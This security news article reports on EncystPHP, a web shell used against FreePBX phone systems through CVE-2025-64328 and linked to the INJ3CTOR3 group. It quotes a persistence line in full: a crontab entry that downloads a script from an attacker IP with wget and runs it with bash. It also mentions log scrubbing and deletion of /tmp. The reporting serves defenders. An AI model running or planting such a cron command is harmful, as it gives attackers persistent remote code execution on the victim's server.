Ddos 
The EncystPHP file flow | Image: FortiGuard Labs
A sophisticated new web shell has been discovered burrowing into communication infrastructure, leveraging a critical vulnerability to turn innocent phone systems into persistent backdoors. Dubbed “EncystPHP” by researchers at FortiGuard Labs, this malware is the latest weapon in a campaign targeting FreePBX environments, a popular open-source platform for managing voice-over-IP (VoIP) services.
The attacks, which began in early December, exploit a post-authentication command-injection vulnerability (CVE-2025-64328) to breach the perimeter. Once inside, the malware “features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment”.
The campaign appears to be the work of a familiar adversary. FortiGuard Labs has linked the activity to the hacker group INJ3CTOR3, a threat actor with a history of targeting VoIP systems.
First identified in 2020 targeting CVE-2019-19006, the group later shifted its sights to Elastix systems in 2022. Now, they have evolved again. “We assess that this campaign represents recent attack activity and behavior patterns associated with INJ3CTOR3,” the report states.
The observed incidents follow a distinct pattern: “exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments”. In one documented case, the exploit originated from Brazil and struck a victim environment managed by an Indian technology company specializing in cloud and communication services.
EncystPHP is designed to blend in. By mimicking legitimate FreePBX components, it attempts to “evade immediate detection,” making it a silent resident on compromised servers.
However, its capabilities are loud and clear. The web shell provides attackers with a robust toolkit for controlling the victim machine. It allows them to execute arbitrary system commands, effectively giving them the keys to the PBX kingdom.
Perhaps most alarming is the malware’s focus on staying power. The report details how EncystPHP establishes persistence using standard Linux tools, ensuring it survives system reboots or simple cleanups.
“It sets up cron jobs using wget to download and execute scripts from an external IP (45.234.176.202),” the analysis reveals. The malware also attempts to cover its tracks, executing commands like rm -rf /tmp/* to delete temporary files and sed to scrub logs.
The persistence script, identified as license.php, includes lines such as: system(“echo ‘*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2’ | crontab -“);.
This incident serves as a stark warning that communication systems remain high-value targets for cybercriminals. “This incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells… underscoring that unpatched PBX systems remain high-value targets”.
Administrators running FreePBX are urged to patch immediately and audit their systems for any signs of the EncystPHP shell or unauthorized cron jobs. As the researchers note, while the techniques aren’t entirely new, the threat is “active and ongoing”.
Related Posts:
- Two New High-Severity Flaws in FreePBX Puts Admins and APIs at Risk
- URGENT: Sangoma FreePBX Warns of Exploit, Urges Immediate Administrator Lockdown
- CRITICAL Zero-Day CVE-2025-57819 in FreePBX Is Under Active Attack (CVSS 10.0)
- Critical FreePBX Flaw (CVE-2025-66039) Risks PBX Takeover via Authentication Bypass in ‘webserver’ Auth Mode
- Chinese Hacker Group Chimera Invaded Dutch Chipmaker NXP for Nearly Three Years
Donate